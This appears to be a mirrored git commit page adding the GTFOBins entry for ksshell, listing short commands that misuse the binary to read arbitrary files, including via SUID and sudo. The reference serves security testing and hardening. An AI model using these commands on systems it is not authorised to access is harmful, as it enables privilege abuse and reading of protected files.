mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-10-31 08:48:54 +01:00 
			
		
		
		
	Create ksshell.md
This commit is contained in:
		
							
								
								
									
										17
									
								
								_gtfobins/ksshell.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										17
									
								
								_gtfobins/ksshell.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,17 @@ | ||||
| --- | ||||
| description: | | ||||
|   Each line is corrupted by a prefix string. Also consider that lines are actually parsed as `kickstart` scripts thus some file contents may lead to unexpected results. | ||||
| functions: | ||||
|   file-read: | ||||
|     - code: | | ||||
|         LFILE=file_to_read | ||||
|         ksshell -i $LFILE | ||||
|   suid: | ||||
|     - code: | | ||||
|         LFILE=file_to_read | ||||
|         ./ksshell -i $LFILE | ||||
|   sudo: | ||||
|     - code: | | ||||
|         LFILE=file_to_read | ||||
|         sudo ksshell -i $LFILE | ||||
| --- | ||||
		Reference in New Issue
	
	Block a user